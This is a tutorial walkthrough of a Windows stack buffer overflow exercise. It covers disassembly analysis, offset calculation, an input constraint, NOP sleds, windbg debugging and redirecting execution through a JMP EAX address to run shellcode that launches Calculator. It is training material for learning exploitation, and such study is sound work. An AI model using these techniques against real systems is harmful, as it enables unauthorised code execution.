Things you'll need:

Disassembly goals:

Familiarize yourself with the logic of the program. Some noteworthy
things in particular are:

Size of stack space created

Offsets and functions of stack variables

Calls to subroutines

Types of input (streams, arguments)

Branching of execution/jmp statements

Next, look at the executable's disassembly. You can use IDA or
anything that'll get the job done.

When reading assembly, especially if you're more accustomed to
high-level languages like C, you'll want to avoid trying to absorb the
code instruction-by-instruction. Look at blocks of instructions to
figure out how they work together to do something useful.

In the example program:

push ebp
mov ebp, esp
sub esp, 100h

Blocks like this are typical. When a function is called (in this case, our main), the address of the next
instruction after call is saved on the stack. This is called the "return address"; once the function
terminates, this address lets the processor know where to resume execution.

Once the return address is pushed, the function saves the old EBP on
the stack and copies the current ESP into EBP, which becomes the base
of the new stack frame. Once that's done, space is reserved on
the stack for local variables. In this case, the size of the stack
space created is 100 hex (256 bytes).

Furthermore, IDA shows us the offsets of important variables/locations
in that reserved space that will be used later by the program. This
is displayed above the start of main.

Buffer= byte ptr -100h
var_FD= byte ptr -0FDh

These are also good to take note of for when they're referenced later.

b) What kind of vulnerability are we looking at? How and where is the
program exploitable?

The next things to look for are areas where the program could
potentially be vulnerable. For stack-based buffer overflows, this will
take the form of user input that is copied onto the stack without
validating whether there is enough space reserved for it. String
functions like strcpy(), for instance, don't perform any bounds
checking; they simply copy until they reach a null terminator, and are
typically exploitable.

Our first function call is a call to gets():

lea eax, [ebp+Buffer]
push eax ; Buffer
call _gets

As we can see, EAX is loaded with the address of Buffer and then
supplied as an argument to the gets() call. Since user input will be
copied into Buffer (on the stack) from stdin with no bounds checking,
this looks like a good candidate for a stack-based buffer overflow
vulnerability.

From earlier, we know that Buffer is located at a 100 hex offset below
EBP, or EBP-100h. Our saved return address is located at EBP+4,
starting 260 bytes (100h + 4) higher than Buffer. In order to cleanly
overwrite it with our own data, we'll need to supply Buffer with
260 + 4 bytes = 264.
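
The offset arithmetic can be checked with a short sketch. The constant
names are made up for illustration; the values come from the
disassembly above (Buffer at EBP-100h, return address at EBP+4) and
assume 4-byte addresses on 32-bit x86.

```python
# Offsets relative to EBP, taken from the disassembly.
BUFFER_OFFSET = -0x100          # Buffer= byte ptr -100h
RETURN_ADDRESS_OFFSET = 4       # saved return address sits at EBP+4
ADDRESS_SIZE = 4                # assumption: 32-bit x86, 4-byte addresses

# Bytes written before the first byte of the return address is reached.
bytes_before_return = RETURN_ADDRESS_OFFSET - BUFFER_OFFSET

# Bytes needed to overwrite the return address completely.
total_bytes = bytes_before_return + ADDRESS_SIZE

print(bytes_before_return)  # 260
print(total_bytes)          # 264
```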

c) What obstacles and constraints on input are we faced with?

Successful exploitation hinges on hijacking EIP, but even if
you've overwritten the return address on the stack, execution will not
be yours until you hit your RET instruction. Though a seemingly
trivial point, it bears mentioning that this means you'll need to make
sure execution doesn't terminate or branch off before you gain
control. Input will need to be crafted such that the necessary
execution conditions are satisfied.

The first block compares the byte at EBP-FD (-253 decimal) with the
hex value 78 (ASCII 'x'). If they match, execution then jumps over the
second block entirely, which is an exit call. Allowing the program to
call exit() will prematurely terminate the program, which is very bad
for us; execution will never arrive at the RET instruction we're
relying on to pop our overwritten return address off the stack and
into EIP.

Given this observation, it's safe to say that we need the byte at
EBP-FD to be a lowercase 'x'. EBP-FD is also the fourth byte of
our Buffer, which is fed through standard input. In order for our
exploitation to succeed, we'll need to feed 'x' as the fourth
character in our payload.
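
To see why EBP-FD is the fourth byte, subtract the two offsets. This
is only a sketch; the variable names are hypothetical and the "AAAx"
prefix is the one used later in this walkthrough.

```python
BUFFER_OFFSET = -0x100   # start of Buffer, relative to EBP
CHECKED_OFFSET = -0xFD   # byte the program compares against 'x'

# Zero-based index of the checked byte within Buffer.
index = CHECKED_OFFSET - BUFFER_OFFSET

prefix = b"AAAx"
print(index)                # 3, i.e. the fourth byte
print(hex(prefix[index]))   # 0x78
```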

Method of Delivery:

a) Delivering your shellcode.

Shellcode is delivered as raw machine-code bytes written for the
target platform. These can be defined as a hex string in your
scripting language of choice, most often using the \xNN format. Perl
is highly recommended: strings are easily created and appended to one
another, and you can use Perl's print() function in conjunction with
the pipe operator "|" in Cygwin to pump your shellcode output to the
exploitable program.

Cygwin is a Linux-like shell environment for Windows. When setting up
Cygwin, you also have the option of installing various packages. Make
sure you get perl and gcc.

Furthermore, while it's not necessary for this example, you can also
pass the output of a Perl script as arguments on the command line,
in which case you'll need to enclose each command within backticks (`),
located on the same key as tilde (~):

./example `perl -e 'print "ARGUMENT1"'`
./example `perl exploit.pl`

b) Structure your payload to work with the constraints on input and
satisfy conditions of execution.

We know from our disassembly that the fourth character we supply
to our vulnerable program needs to be lowercase 'x' (0x78). After
that, we have 256 bytes to fill before we overwrite the return
address. What a fantastic place to put your shellcode! It will,
however, need to be padded; the shellcode is only 127 bytes.

The most commonly used padding tends to be what are called "NOP
instructions". NOP instructions are instructions that perform either
no operation or one that will not really interfere with the operation
of our shellcode. The latter is, of course, context-dependent. The
most common are 0x90 (NOP, which does nothing) and 0x41 (both ASCII
"A" and inc ecx, depending on whether it's interpreted as data or as
an instruction). The fact that they're single-byte instructions makes
them ideal for plugging up holes. Not only that, but if you miss your
shellcode and EIP lands somewhere on your padding before your
shellcode, the processor will execute these NOP instructions
one-by-one until it gets to the beginning of your shellcode. This
technique is called a "NOP sled".
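
The layout described in this section can be sketched as a length
calculation. Everything here is an assumption for illustration: the
variable names are made up, the shellcode is replaced by int3 (0xCC)
placeholder bytes of the quoted length, and "BBBB" stands in for the
return address. Only the sizes come from the text.

```python
# Sizes taken from the text; byte values are placeholders only.
BYTES_BEFORE_RETURN = 260   # Buffer at EBP-100h, return address at EBP+4
SHELLCODE_LENGTH = 127      # length quoted in the text
PREFIX = b"AAAx"            # fourth byte must be 'x' (0x78)
NOP = b"\x90"

# Hypothetical stand-in for the real shellcode: int3 breakpoints.
placeholder_shellcode = b"\xcc" * SHELLCODE_LENGTH

# Padding needed so the return address lands in the right place.
filler_length = BYTES_BEFORE_RETURN - len(PREFIX) - len(placeholder_shellcode)
filler = NOP * filler_length

return_marker = b"BBBB"     # marker where the return address would go

layout = PREFIX + filler + placeholder_shellcode + return_marker
print(filler_length)  # 129
print(len(layout))    # 264
```

Putting the filler before the shellcode is what lets the padding act
as a sled: execution that lands anywhere in it slides forward into the
first shellcode byte.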

Debugging:

a) Setting up windbg as your post-mortem debugger.

You can register windbg as your post-mortem debugger with the -I
option. In Win 2000, you'll want to select "Run" from the Start menu,
browse for the location of windbg (usually under Debugging Tools for
Windows), and then append -I as an argument:

"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" -I

Post-mortem means that when a program throws an exception that no
handler deals with (for example, it crashes), Windows launches the
registered debugger and attaches it to the failing process. So, say you
overwrite the return address on the stack with "AAAA"; this will cause
an Access Violation when the processor tries to resume execution at
address 0x41414141, and your debugging environment will fire up
automatically.

The commands you'll probably use most for this exercise are p and
t (step over/step into respectively), bp 0xNNNNNNNN (set breakpoint at
address 0xNNNNNNNN), and g (continue to next breakpoint).

b) Testing hypotheses by observation of stack behavior/registers.

You won't always succeed in popping a shell on the first try. Don't despair!

First, focus on owning EIP. Keep an eye on the stack. Observe its
behavior at several different points of execution as well as its
effect on the location of your saved return address. Try first
overwriting it with ASCII to see if you manage to cause an access
violation, then use a separate 4-byte string, one that's
distinguishable from other padding (if your padding is A's, try
"BBBB"), and place it at the point in your payload where you -think-
you'll be overwriting the return address. If EIP ends up holding that
marker, you know your offset is right and you're not overshooting the
return address completely.
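
As a rough aid for reading the debugger output, the sketch below shows
which EIP value each 4-byte marker turns into when it is loaded as a
little-endian doubleword. The helper name is hypothetical.

```python
import struct

def eip_after_overwrite(four_bytes: bytes) -> int:
    """Interpret four payload bytes the way RET loads them into EIP."""
    (value,) = struct.unpack("<I", four_bytes)
    return value

print(hex(eip_after_overwrite(b"AAAA")))  # 0x41414141
print(hex(eip_after_overwrite(b"BBBB")))  # 0x42424242
```

An access violation at 0x42424242 means the marker sits exactly over
the return address; 0x41414141 means the padding reached it instead.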

If you're still not getting EIP and you swear you've provided
enough characters to cause an overflow, the problem may lie in the
execution. Try stepping through the program with the debugger to see
if you ever reach your RET instruction; maybe something was
overlooked. For example, our program calls exit() unless 'x' is the
4th byte of our payload.

c) Dealing with non-stack addresses.

One of the victory conditions for these awbo exercises is that you
must successfully exploit the program without explicitly referencing
any stack addresses. In other words, the return address should not be
overwritten with an address on the stack, but you may use any other
address in memory.

Remember -- data is just data; it's how it's interpreted that's
important, and there are other ways to get to the stack. The stack
address you need to jump to might still be in one of your registers,
or even on the stack itself. If only there were some instruction in
memory you could use to your advantage... Hmm...

In our example program, if you set a breakpoint at the address of
RET (bp 0x00401038 for me) and examine your registers, you'll notice
something: the address of the first byte of our buffer happens to be
sitting in the EAX register. A JMP EAX instruction would get us there
painlessly. All we need to do is find it in memory.
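
On 32-bit x86, JMP EAX encodes as the two bytes FF E0, so finding the
instruction comes down to a byte-pattern search. The sketch below
shows the idea on a made-up byte string; the sample bytes, the base
address and the function name are all assumptions for illustration,
not output from the example program.

```python
JMP_EAX = b"\xff\xe0"  # opcode bytes for JMP EAX on 32-bit x86

def find_all(haystack: bytes, needle: bytes, base_address: int = 0) -> list:
    """Return the address of every occurrence of needle in haystack."""
    hits = []
    start = haystack.find(needle)
    while start != -1:
        hits.append(base_address + start)
        start = haystack.find(needle, start + 1)
    return hits

# Hypothetical memory dump, pretending it was read from address 0x1000.
sample = b"\x90\x90\xff\xe0\xc3\x55\x8b\xec\xff\xe0"
hits = find_all(sample, JMP_EAX, base_address=0x1000)
print([hex(address) for address in hits])  # ['0x1002', '0x1008']
```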

You can search for bytes, words, doublewords and ASCII in
windbg with the "s" command. The syntax is listed in the windbg
cheatsheet:

To review:

"AAAx" satisfies our requirement that the 4th byte be "x".
'$filler' is our padding.
'$shellcode' is the code that will actually be executed.
"\x58\x40\x2b\x00" is the address of our JMP EAX instruction, fed to the program in reverse-byte order
because of little-endianness.
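
The byte order can be double-checked with a small sketch. It assumes
the address 0x002B4058, which is simply the four bytes above read back
in reverse; the constant name is made up.

```python
import struct

JMP_EAX_ADDRESS = 0x002B4058  # address implied by the bytes in the review

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
packed = struct.pack("<I", JMP_EAX_ADDRESS)
print(packed.hex())  # 58402b00
```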

Just pipe it to your program, run 'g' from the windbg command line and voila! Calculator!